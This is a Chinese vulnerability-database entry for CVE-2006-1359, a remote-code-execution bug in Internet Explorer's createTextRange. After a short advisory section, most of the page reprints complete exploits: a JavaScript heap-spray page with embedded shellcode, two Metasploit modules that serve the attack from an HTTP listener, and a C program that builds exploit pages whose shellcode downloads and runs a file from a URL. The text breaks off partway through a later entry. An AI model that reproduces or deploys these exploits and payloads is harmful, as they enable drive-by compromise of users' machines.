CVE-2006-1359
CVSS9.3
发布时间 :2006-03-22 19:06:00
修订时间 :2011-03-07 21:32:52
NMCOEPS    

[原文]Microsoft Internet Explorer 6 and 7 Beta 2 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a certain createTextRange call on a checkbox object, which results in a dereference of an invalid table pointer.


[CNNVD]Microsoft Internet Explorer CreateTextRange远程代码执行漏洞(CNNVD-200603-375)

        Microsoft Internet Explorer是微软发布的非常流行的WEB浏览器。
        Internet Explorer的createTextRange()函数实现上存在漏洞,远程攻击者可能利用此漏洞在客户机器上执行任意指令。
        Internet Explorer使用createTextRange()时在某些环境下可能导致无需的列表指针引用,这样在试图调用引用的32位地址时就会出现错误,如下所示:
        0x7D53C15D MOV ECX, DWORD PTR DS:[EDI]
        ..
        0x7D53C166 CALL DWORD PTR [ECX]
        由于这种引用,ECX会指向很远的不存在的内存位置,导致IE崩溃,也可能执行任意指令。

- CVSS (基础分值)

CVSS分值: 9.3 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: MEDIUM [漏洞利用存在一定的访问条件]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-94 [对生成代码的控制不恰当(代码注入)]

- CPE (受影响的平台与产品)

cpe:/a:microsoft:ie:7.0:beta_2
cpe:/a:microsoft:ie:6.0:sp2
cpe:/a:microsoft:ie:6.0:sp1
cpe:/a:microsoft:ie:6.0Microsoft Internet Explorer 6.0

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:985IE6 DHTML Method Call Memory Corruption (WinXP)
oval:org.mitre.oval:def:1702IE6 DHTML Method Call Memory Corruption (Win2K/XP,SP1)
oval:org.mitre.oval:def:1678IE 5.01 DHTML Method Call Memory Corruption
oval:org.mitre.oval:def:1657IE6 DHTML Method Call Memory Corruption (Server 2003,SP1)
oval:org.mitre.oval:def:1178IE6 DHTML Method Call Memory Corruption (Server 2003)
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1359
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1359
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200603-375
(官方数据源) CNNVD

- 其它链接及资源

http://www.us-cert.gov/cas/techalerts/TA06-101A.html
(UNKNOWN)  CERT  TA06-101A
http://www.kb.cert.org/vuls/id/876678
(UNKNOWN)  CERT-VN  VU#876678
http://xforce.iss.net/xforce/xfdb/25379
(UNKNOWN)  XF  ie-createtextrange-command-execution(25379)
http://www.vupen.com/english/advisories/2006/1318
(UNKNOWN)  VUPEN  ADV-2006-1318
http://www.vupen.com/english/advisories/2006/1050
(UNKNOWN)  VUPEN  ADV-2006-1050
http://www.securityfocus.com/bid/17196
(UNKNOWN)  BID  17196
http://www.securityfocus.com/archive/1/archive/1/429124/30/6120/threaded
(UNKNOWN)  BUGTRAQ  20060328 Determina Fix for CVE-2006-1359 (Zero Day MS Internet Explorer Remote "CreateTextRange()" Code Execution)
http://www.securityfocus.com/archive/1/archive/1/429088/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060328 EEYE: Temporary workaround for IE createTextRange vulnerability
http://www.securityfocus.com/archive/1/archive/1/428600/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060323 Secunia Research: Microsoft Internet Explorer "createTextRange()"Code Execution
http://www.securityfocus.com/archive/1/archive/1/428583/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060322 Microsoft Internet Explorer (mshtml.dll) - Remote Code Execution
http://www.securityfocus.com/archive/1/428441
(UNKNOWN)  BUGTRAQ  20060322 IE crash
http://www.osvdb.org/24050
(UNKNOWN)  OSVDB  24050
http://www.microsoft.com/technet/security/bulletin/ms06-013.mspx
(UNKNOWN)  MS  MS06-013
http://www.microsoft.com/technet/security/advisory/917077.mspx
(UNKNOWN)  CONFIRM  http://www.microsoft.com/technet/security/advisory/917077.mspx
http://www.computerterrorism.com/research/ct22-03-2006
(VENDOR_ADVISORY)  MISC  http://www.computerterrorism.com/research/ct22-03-2006
http://www.ciac.org/ciac/bulletins/q-154.shtml
(UNKNOWN)  CIAC  Q-154
http://securitytracker.com/id?1015812
(UNKNOWN)  SECTRACK  1015812
http://secunia.com/secunia_research/2006-7/advisory/
(UNKNOWN)  MISC  http://secunia.com/secunia_research/2006-7/advisory/
http://secunia.com/advisories/18680
(VENDOR_ADVISORY)  SECUNIA  18680
http://archives.neohapsis.com/archives/fulldisclosure/2006-03/1662.html
(UNKNOWN)  FULLDISC  20060327 Determina Fix for the IE createTextRange() bug
http://archives.neohapsis.com/archives/fulldisclosure/2006-03/1434.html
(UNKNOWN)  FULLDISC  20060322 FW: [Full-disclosure] IE crash
http://archives.neohapsis.com/archives/fulldisclosure/2006-03/1430.html
(UNKNOWN)  FULLDISC  20060322 Microsoft Internet Explorer (mshtml.dll) - Remote Code Execution
http://archives.neohapsis.com/archives/fulldisclosure/2006-03/1427.html
(UNKNOWN)  FULLDISC  20060322 IE crash

- 漏洞信息

Microsoft Internet Explorer CreateTextRange远程代码执行漏洞
高危 设计错误
2006-03-22 00:00:00 2006-03-23 00:00:00
远程  
        Microsoft Internet Explorer是微软发布的非常流行的WEB浏览器。
        Internet Explorer的createTextRange()函数实现上存在漏洞,远程攻击者可能利用此漏洞在客户机器上执行任意指令。
        Internet Explorer使用createTextRange()时在某些环境下可能导致无需的列表指针引用,这样在试图调用引用的32位地址时就会出现错误,如下所示:
        0x7D53C15D MOV ECX, DWORD PTR DS:[EDI]
        ..
        0x7D53C166 CALL DWORD PTR [ECX]
        由于这种引用,ECX会指向很远的不存在的内存位置,导致IE崩溃,也可能执行任意指令。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        http://www.microsoft.com/technet/security/Bulletin/MS06-013.mspx?pf=true

- 漏洞信息 (1606)

MS Internet Explorer (createTextRang) Remote Code Execution Exploit (EDBID:1606)
windows remote
2006-03-23 Verified
0 darkeagle
N/A [点击下载]
<!--
 -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
/\
\/	Internet Explorer Remote Code Execution Exploit v 0.1
/\		  by Darkeagle of Unl0ck Research Team
\/
/\	used SkyLined idea of exploitation. special tnx goes to him.
\/

Affected Software	:  Microsoft Internet Explorer 6.x, IE7 Beta 2
Severity		:  Critical
Impact		:  Remote System Access
Solution Status	:  ** UNPATCHED **
Discovered by 	:  Computer Terrorism (UK)
Advisory Date	:  22nd March, 2006
Tested		:  WinXP SP2 RUS IE 6.0 (full patched)

Vulnerability details:

PoC from CyberTerrorists crashes IE and overwrites EIP. EIP points to unknown place.
In my case it points to 0x3c0474c2.
Exploit fills heap with "nops+shellcode" 'til 0x3CxxXXxx. Then IE trys to read memory
@ 0x3c0474c2. At this time 0x3c0474c2 contains nops+shellcode. In the end IE executes
shellcode.

Exploit needs more RAM.
Tested under 192mb RAM with 800mb of maximum page cache.

Under 512mb code was executed after 1-1.5 minutes.

Successfull exploitation will execute standart windows calculator.

Greets: 
		Unl0ck Researchers,
		0x557 guys,
		ph4nt0m guys,
		sh0k, uf0,
		BlackSecurity guys,
		many otherz.

/\	http://unl0ck.net
\/	
/\	(c) 2004 - 2006
\/
 -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
 -->

<input type="checkbox" id="blah">
<SCRIPT language="javascript">

shellcode = unescape(	"%u9090%u9090%u9090%uC929%uE983%uD9DB%uD9EE%u2474" +
			"%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" +
			"%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" +
			"%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" +
			"%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" +
			"%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" +
			"%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" +
			"%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" +
			"%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" +
			"%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" +
			"%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" +
			"%uCC4A%uD0FF");

    bigblock = unescape("%u9090%u9090"); 
    slackspace = 20 + shellcode.length

    while (bigblock.length < slackspace)
		bigblock += bigblock;

    fillblock = bigblock.substring(0, slackspace);

    block = bigblock.substring(0, bigblock.length-slackspace);

    while(block.length + slackspace < 0x40000) 
		block = block + block + fillblock;

    memory = new Array();

    for ( i = 0; i < 2020; i++ ) 
		memory[i] = block + shellcode;
  
    var r = document.getElementById('blah').createTextRange();

</script>

# milw0rm.com [2006-03-23]
		

- 漏洞信息 (1620)

MS Internet Explorer (createTextRang) Remote Exploit (meta update) (EDBID:1620)
windows remote
2006-04-01 Verified
0 Randy Flood
N/A [点击下载]
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::ie_createtextrange;

use strict;
use base "Msf::Exploit";
use Pex::Text;
use IO::Socket::INET;
use IPC::Open3;

my $advanced =
  {
	'Gzip'       => [1, 'Enable gzip content encoding'],
	'Chunked'    => [1, 'Enable chunked transfer encoding'],
  };

my $info =
  {
	'Name'           => 'Internet Explorer createTextRange() Code Execution',
	'Version'        => '$Revision: 1.4 $',
	'Authors'        =>
	  [
		'Faithless <rhyskidd [at] gmail.com>',
		'Darkeagle <unl0ck.net>',
		'H D Moore <hdm [at] metasploit.com>',
		'<justfriends4n0w [at] yahoo.com>',
		'Anonymous',
	  ],

	'Description'    =>
	  Pex::Text::Freeform(qq{
		This module exploits a code execution vulnerability in Microsoft Internet Explorer.
	Both IE6 and IE7 (Beta 2) are vulnerable. It will corrupt memory  in a way, which, under 
	certain circumstances, can lead to an invalid/corrupt table pointer dereference. EIP will point
	to a very remote, non-existent memory location. This module is the result of merging three
	different exploit submissions and has only been reliably tested against Windows XP SP2.
	This vulnerability was independently discovered by multiple parties. The heap spray method
	used by this exploit was pioneered by Skylined.
}),

	'Arch'           => [ 'x86' ],
	'OS'             => [ 'win32', 'winxp', 'win2003' ],
	'Priv'           => 0,

	'UserOpts'       =>
	  {
		'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080      ],
		'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
	  },

	'Payload'        =>
	  {
		'Space'    => 1024,
		'BadChars' => "\x00",
		'Keys'     => ['-bind'],
	  },
	'Refs'           =>
	  [
		['OSVDB', '24050'],
		['BID', '17196'],
		['CVE', '2006-1359'],
		['URL', 'http://secunia.com/secunia_research/2006-7/advisory/'],
		['URL', 'http://seclists.org/lists/bugtraq/2006/Mar/0410.html'],
		['URL', 'http://www.kb.cert.org/vuls/id/876678'],
		['URL', 'http://seclists.org/lists/fulldisclosure/2006/Mar/1439.html'],
		['URL', 'http://www.shog9.com/crashIE.html'],
	  ],

	'DefaultTarget'  => 0,
	'Targets'        =>
	  [
		[ 'Internet Explorer 7 - (7.0.5229.0) -> 3C0474C2 (Windows XP SP2)' ],
		[ 'Internet Explorer 6 - (6.0.3790.0) -> 746F9468 (Windows XP SP2)' ],
	  ],

	'Keys'           => [ 'ie' ],

	'DisclosureDate' => 'Mar 19 2006',
  };

sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
	return($self);
}

sub Exploit
{
	my $self = shift;
	
	if (! $self->InitNops(128)) {
		$self->PrintLine("[*] Failed to initialize the NOP module.");
		return;
	}

	my $server = IO::Socket::INET->new(
		LocalHost => $self->GetVar('HTTPHOST'),
		LocalPort => $self->GetVar('HTTPPORT'),
		ReuseAddr => 1,
		Listen    => 1,
		Proto     => 'tcp'
	  );
	my $client;

	# Did the listener create fail?
	if (not defined($server)) {
		$self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT'));
		return;
	}

	my $httphost = ($self->GetVar('HTTPHOST') eq '0.0.0.0') ?
	  Pex::Utils::SourceIP('1.2.3.4') :
	  $self->GetVar('HTTPHOST');

	$self->PrintLine("[*] Waiting for connections to http://". $httphost .":". $self->GetVar('HTTPPORT') ."/");

	while (defined($client = $server->accept())) {
		$self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client));
	}

	return;
}

sub HandleHttpClient
{
	my $self = shift;
	my $fd   = shift;

	# Set the remote host information
	my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);

	# Read the HTTP command
	my ($cmd, $url, $proto) = split(/ /, $fd->RecvLine(10), 3);
	my $agent;

	# Read in the HTTP headers
	while ((my $line = $fd->RecvLine(10))) {

		$line =~ s/^\s+|\s+$//g;

		my ($var, $val) = split(/\:/, $line, 2);

		# Break out if we reach the end of the headers
		last if (not defined($var) or not defined($val));

		$agent = $val if $var =~ /User-Agent/i;
	}

	my $os = 'Unknown';

	$os = 'Linux'     if $agent =~ /Linux/i;
	$os = 'Mac OS X'  if $agent =~ /OS X/i;
	$os = 'Windows'   if $agent =~ /Windows/i;

	$self->PrintLine("[*] Client connected from $rhost:$rport ($os).");

	my $res = $fd->Send($self->BuildResponse($self->GenerateHTML()));

	$fd->Close();
}

sub JSUnescape {
	my $self = shift;
	my $data = shift;
	my $code = '';

	# Encode the shellcode via %u sequences for JS's unescape() function
	my $idx = 0;
	while ($idx < length($data) - 1) {
		my $c1 = ord(substr($data, $idx, 1));
		my $c2 = ord(substr($data, $idx+1, 1));
		$code .= sprintf('%%u%.2x%.2x', $c2, $c1);
		$idx += 2;
	}

	return $code;
}

sub GenerateHTML {
	my $self   = shift;
	my $target = $self->Targets->[$self->GetVar('TARGET')];

	my $shellcode    = $self->JSUnescape($self->GetVar('EncodedPayload')->Payload);
	my $nops         = $self->JSUnescape($self->MakeNops(4));
	my $rnd          = int(rand(3));
	my $inputtype    = (($rnd == 0) ? "checkbox" : (($rnd == 1) ? "radio" : "image"));
	my $inp          = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
	my $tmp          = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
	my $payload      = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
	my $nopslide     = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
	my $slidesize    = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
	my $fillblock    = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
	my $memblock     = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
	my $heap         = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
	my $index        = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
	my $maxIndex     = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
	my $fillHeap     = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
	my $start        = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
	my $timer        = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
	$rnd             = int(rand(2));
	my $setTimeout   =($rnd == 0) ? "setTimeout('$fillHeap()', 5);" : "";
	my $setInterval  =($rnd == 1) ? "setInterval('$fillHeap()', 5);" : "";

	my $data  = qq#
<html>
<head>
	<script language="javascript">
    var $payload=unescape("$shellcode");

    var $nopslide=unescape("$nops");
    var $slidesize=20+$payload.length;
    while ($nopslide.length<$slidesize)
    {
        $nopslide+=$nopslide;
    }    

    var $fillblock=$nopslide.substring(0,$slidesize);
    var $memblock=$nopslide.substring(0,$nopslide.length-$slidesize);

    while($memblock.length+$slidesize<0x40000)
    {
        $memblock+=$fillblock;
    }    

    var $heap=new Array();
    var $index=0;
    var $maxIndex=2020;
    
    function $fillHeap() {
      $timer.innerHTML=Math.round(($index/$maxIndex)*100);
      if ($index<$maxIndex) {
        $heap.push($memblock+$payload);
        $index++;
        $setTimeout
      }
      else {
        $timer.innerHTML=100;
        $inp=document.createElement("input");
        $inp.type="$inputtype";
        $tmp=$inp.createTextRange();        
      }
    }   
    
    function $start() {
      $setTimeout$setInterval
    }
	</script>
</head>
<body onload="$start()">
Sit back and relax as your windows box is being exploited using a non CPU consuming heap spraying exploit.<BR />
In the meantime, you can open your task manager and watch how the VM size of IEXPLORE.EXE grows, while the CPU time of this process is very low.<BR />
Progress: <span id="$timer"></span>%
</body>
</html>
#;
}

sub BuildResponse {
	my ($self, $content) = @_;

	my $response =
	  "HTTP/1.1 200 OK\r\n" .
	  "Content-Type: text/html\r\n";

	if ($self->GetVar('Gzip')) {
		$response .= "Content-Encoding: gzip\r\n";
		$content = $self->Gzip($content);
	}
	if ($self->GetVar('Chunked')) {
		$response .= "Transfer-Encoding: chunked\r\n";
		$content = $self->Chunk($content);
	} else {
		$response .= 'Content-Length: ' . length($content) . "\r\n" .
		  "Connection: close\r\n";
	}

	$response .= "\r\n" . $content;

	return $response;
}

sub Chunk {
	my ($self, $content) = @_;

	my $chunked;
	while (length($content)) {
		my $chunk = substr($content, 0, int(rand(10) + 1), '');
		$chunked .= sprintf('%x', length($chunk)) . "\r\n$chunk\r\n";
	}
	$chunked .= "0\r\n\r\n";

	return $chunked;
}

sub Gzip {
	my $self = shift;
	my $data = shift;
	my $comp = int(rand(5))+5;

	my($wtr, $rdr, $err);

	my $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force');
	print $wtr $data;
	close ($wtr);
	local $/;

	return (<$rdr>);
}
1;

# milw0rm.com [2006-04-01]
		

- 漏洞信息 (1628)

MS Internet Explorer (createTextRang) Download Shellcoded Exploit (2) (EDBID:1628)
windows remote
2006-03-31 Verified
0 ATmaCA
N/A [点击下载]
/*
*
* Internet Explorer "createTextRang" Download Shellcoded Exploit (2)
* Bug discovered by Computer Terrorism (UK)
* http://www.computerterrorism.com/research/ct22-03-2006
*
* Affected Software: Microsoft Internet Explorer 6.x & 7 Beta 2
* Severity: Critical
* Impact: Remote System Access
* Solution Status: Unpatched
*
* E-Mail: atmaca@icqmail.com
* Web: http://www.spyinstructors.com,http://www.atmacasoft.com
* Credit to Kozan,SkyLined,delikon,Darkeagle,Stelian Ene
*
*/

/*
*
* This one is more faster than all released createTextRange exploits
* because it uses last version of SkyLined's heap spraying code,
* special 10x goes to him.
*
*/

#include <windows.h>
#include <stdio.h>

#define BUF_LEN         0x800
#define FILE_NAME       "index.htm"

char body1[] =
	"<input type=\"checkbox\" id=\"blah\">\r\n"
	"<SCRIPT language=\"javascript\">\r\n\r\n"
	"\tvar heapSprayToAddress = 0x3c0974c2;\r\n\r\n"
	"\tvar payLoadCode = unescape(\"%u9090%u9090%u9090\" +\r\n"
	"\t\"%uCCE9%u0000%u5F00%u56E8%u0000%u8900%u50C3%u8E68%u0E4E%uE8EC\" +\r\n"
	"\t\"%u0060%u0000%uC931%uB966%u6E6F%u6851%u7275%u6D6C%uFF54%u50D0\" +\r\n"
	"\t\"%u3668%u2F1A%uE870%u0046%u0000%uC931%u5151%u378D%u8D56%u0877\" +\r\n"
	"\t\"%u5156%uD0FF%u6853%uFE98%u0E8A%u2DE8%u0000%u5100%uFF57%u31D0\" +\r\n"
	"\t\"%u49C9%u9090%u6853%uD87E%u73E2%u19E8%u0000%uFF00%u55D0%u6456\" +\r\n"
	"\t\"%u30A1%u0000%u8B00%u0C40%u708B%uAD1C%u688B%u8908%u5EE8%uC35D\" +\r\n"
	"\t\"%u5553%u5756%u6C8B%u1824%u458B%u8B3C%u0554%u0178%u8BEA%u184A\" +\r\n"
	"\t\"%u5A8B%u0120%uE3EB%u4935%u348B%u018B%u31EE%uFCFF%uC031%u38AC\" +\r\n"
	"\t\"%u74E0%uC107%u0DCF%uC701%uF2EB%u7C3B%u1424%uE175%u5A8B%u0124\" +\r\n"
	"\t\"%u66EB%u0C8B%u8B4B%u1C5A%uEB01%u048B%u018B%uE9E8%u0002%u0000\" +\r\n"
	"\t\"%uC031%uEA89%u5E5F%u5B5D%uE8C3%uFF2F%uFFFF%u686D%u2E68%u7865\" +\r\n"
	"\t\"%u0065";

char body2[] =
	"\r\n\r\n\tvar heapBlockSize = 0x400000;\r\n\r\n"
	"\tvar payLoadSize = payLoadCode.length * 2;\r\n\r\n" 
	"\tvar spraySlideSize = heapBlockSize - (payLoadSize+0x38);\r\n\r\n"
	"\tvar spraySlide = unescape(\"%u9090%u9090\");\r\n" 
	"\tspraySlide = getSpraySlide(spraySlide,spraySlideSize);\r\n\r\n"
	"\theapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;\r\n\r\n"
	"\tmemory = new Array();\r\n\r\n"
	"\tfor (i=0;i<heapBlocks;i++)\r\n" 
	"\t{\r\n\t\tmemory[i] = spraySlide + payLoadCode;\r\n\t}\r\n\r\n"
	"\tvar r = document.getElementById('blah').createTextRange();\r\n\r\n"
	"\tfunction getSpraySlide(spraySlide, spraySlideSize)\r\n" 
	"\t{\r\n\t\twhile (spraySlide.length*2<spraySlideSize)\r\n\t\t{\r\n"
	"\t\t\tspraySlide += spraySlide;\r\n\t\t}\r\n"	
	"\t\tspraySlide = spraySlide.substring(0,spraySlideSize/2);\r\n"
	"\t\treturn spraySlide;\r\n"
	"\t}\r\n\r\n</script>";


int main(int argc,char *argv[])
{
        if (argc < 2)
        {
                printf("\nInternet Explorer \"createTextRang\" Download Shellcoded Exploit (2)");
				printf("\nCoded by ATmaCA (atmaca[at]icqmail.com)\n");
                printf("\nUsage:\n");
                printf("ie_exp <WebUrl>\n");

                return 0;
        }

        FILE *File;
        char *pszBuffer;
        char *web = argv[1];
        char *pu = "%u";
        char u_t[5];
        char *utf16 = (char*)malloc(strlen(web)*5);

        if ( (File = fopen(FILE_NAME,"w+b")) == NULL ) {
                printf("\n [Err:] fopen()");
                exit(1);
        }

        pszBuffer = (char*)malloc(BUF_LEN);
        memcpy(pszBuffer,body1,sizeof(body1)-1);

        memset(utf16,'\0',strlen(web)*5);
        for (unsigned int i=0;i<strlen(web);i=i+2)
        {
                sprintf(u_t,"%s%.2x%.2x", pu, web[i+1], web[i]);
                strcat(utf16,u_t);
        }

        strcat(pszBuffer,utf16);
        strcat(pszBuffer,"%u0000\");");
        strcat(pszBuffer,body2);

        fwrite(pszBuffer, BUF_LEN, 1,File);
        fclose(File);

        printf("\n\n"  FILE_NAME  " has been created in the current directory.\n");
        return 1;
}

// milw0rm.com [2006-03-31]
		

- 漏洞信息 (16578)

Internet Explorer createTextRange() Code Execution (EDBID:16578)
windows remote
2010-09-20 Verified
0 metasploit
N/A [点击下载]
##
# $Id: ms06_013_createtextrange.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::HttpServer::HTML

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Internet Explorer createTextRange() Code Execution',
			'Description'    => %q{
					This module exploits a code execution vulnerability in Microsoft Internet Explorer.
				Both IE6 and IE7 (Beta 2) are vulnerable. It will corrupt memory  in a way, which, under
				certain circumstances, can lead to an invalid/corrupt table pointer dereference. EIP will point
				to a very remote, non-existent memory location. This module is the result of merging three
				different exploit submissions and has only been reliably tested against Windows XP SP2.
				This vulnerability was independently discovered by multiple parties. The heap spray method
				used by this exploit was pioneered by Skylined.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'Faithless <rhyskidd [at] gmail.com>',
					'Darkeagle <unl0ck.net>',
					'hdm',
					'<justfriends4n0w [at] yahoo.com>',
					'anonymous',
				],
			'Version'        => '$Revision: 10394 $',
			'References'     =>
				[
					['CVE', '2006-1359'],
					['OSVDB', '24050'],
					['MSB', 'MS06-013'],
					['BID', '17196'],
					['US-CERT-VU', '876678'],
					['URL', 'http://secunia.com/secunia_research/2006-7/advisory/'],
					['URL', 'http://seclists.org/lists/bugtraq/2006/Mar/0410.html'],
					['URL', 'http://seclists.org/lists/fulldisclosure/2006/Mar/1439.html'],
					['URL', 'http://www.shog9.com/crashIE.html'],
				],
			'Payload'        =>
				{
					'Space'          => 1024,
					'BadChars'       => "\x00",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Internet Explorer 6 - (6.0.3790.0 - Windows XP SP2)', { 'Ret' => 0x746F9468 } ],
					[ 'Internet Explorer 7 - (7.0.5229.0 - Windows XP SP2)', { 'Ret' => 0x3C0474C2 } ],

				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Mar 19 2006'))
	end

	def on_request_uri(cli, request)

		# Re-generate the payload
		return if ((p = regenerate_payload(cli)) == nil)

		# Encode the shellcode
		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

		# Create some nops
		nops = Rex::Text.to_unescape(make_nops(4))

		# Generate a random XML namespace for VML
		xmlns = rand_text_alpha(rand(30)+2)

		# Randomize the javascript variable names
		rnd              = rand(3)
		var_inputtype    = ((rnd == 0) ? "checkbox" : ((rnd == 1) ? "radio" : "image"))
		var_inp          = "_"+rand_text_alpha(rand(6)+3)
		var_tmp          = "_"+rand_text_alpha(rand(6)+3)
		var_payload      = "_"+rand_text_alpha(rand(6)+3)
		var_nopslide     = "_"+rand_text_alpha(rand(6)+3)
		var_slidesize    = "_"+rand_text_alpha(rand(6)+3)
		var_fillblock    = "_"+rand_text_alpha(rand(6)+3)
		var_memblock     = "_"+rand_text_alpha(rand(6)+3)
		var_heap         = "_"+rand_text_alpha(rand(6)+3)
		var_index        = "_"+rand_text_alpha(rand(6)+3)
		var_maxIndex     = "_"+rand_text_alpha(rand(6)+3)
		var_fillHeap     = "_"+rand_text_alpha(rand(6)+3)
		var_start        = "_"+rand_text_alpha(rand(6)+3)
		var_timer        = "_"+rand_text_alpha(rand(6)+3)
		rnd              = rand(2)
		var_setTimeout   = (rnd == 0) ? "setTimeout('#{var_fillHeap}()', 5)" : ""
		var_setInterval  = (rnd == 1) ? "setInterval('#{var_fillHeap}()', 5)" : ""

		# Build out the message
		content = %Q|<html>
<head>
<script language = "javascript">
var #{var_payload} = unescaape("#{shellcode}");
var #{var_nopslide} = unescape("#{nops}");
var #{var_slidesize} = 20+#{var_payload}.length;
while (#{var_nopslide}.length<#{var_slidesize}) { #{var_nopslide} += #{var_nopslide}; }
var #{var_fillblock} = #{var_nopslide}.substring(0,#{var_slidesize});
var #{var_memblock} = #{var_nopslide}.substring(0,#{var_nopslide}.length-#{var_slidesize});
while(#{var_memblock}.length+#{var_slidesize} < 0x40000) { #{var_memblock} += #{var_fillblock}; }
var #{var_heap} = new Array();
var #{var_index} = 0;
var #{var_maxIndex} = 2020;
function #{var_fillHeap}() {
#{var_timer}.innerHTML = Math.round((#{var_index}/#{var_maxIndex})*100);
if (#{var_index}<#{var_maxIndex}) {
#{var_heap}.push(#{var_memblock}+#{var_payload});
#{var_index}++;
#{var_setTimeout}
} else {
#{var_timer}.innerHTML = 100;
#{var_inp} = document.createElement("input");
#{var_inp}.type = "#{var_inputtype}";
#{var_tmp} = #{var_inp}.createTextRange();
}
}
function #{var_start}() {
#{var_setTimeout}#{var_setInterval}
}
</script>
</head>
<body onload="#{var_start}()">
<span id="#{var_timer}"> % </span>
</body>
</html>
|

		content = Rex::Text.randomize_space(content)

		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

		# Transmit the response to the client
		send_response_html(cli, content)

		# Handle the payload
		handler(cli)
	end

end
		

- 漏洞信息 (F83089)

Internet Explorer createTextRange() Code Execution (PacketStormID:F83089)
2009-11-26 00:00:00
H D Moore,Darkeagle,justfriends4n0w,Faithless  metasploit.com
exploit,remote,code execution
windows,xp
CVE-2006-1359
[点击下载]

This Metasploit module exploits a code execution vulnerability in Microsoft Internet Explorer. Both IE6 and IE7 (Beta 2) are vulnerable. It will corrupt memory in a way, which, under certain circumstances, can lead to an invalid/corrupt table pointer dereference. EIP will point to a very remote, non-existent memory location. This Metasploit module is the result of merging three different exploit submissions and has only been reliably tested against Windows XP SP2. This vulnerability was independently discovered by multiple parties. The heap spray method used by this exploit was pioneered by Skylined.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpServer::HTML

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Internet Explorer createTextRange() Code Execution',
			'Description'    => %q{
				This module exploits a code execution vulnerability in Microsoft Internet Explorer.
				Both IE6 and IE7 (Beta 2) are vulnerable. It will corrupt memory  in a way, which, under 
				certain circumstances, can lead to an invalid/corrupt table pointer dereference. EIP will point
				to a very remote, non-existent memory location. This module is the result of merging three
				different exploit submissions and has only been reliably tested against Windows XP SP2.
				This vulnerability was independently discovered by multiple parties. The heap spray method
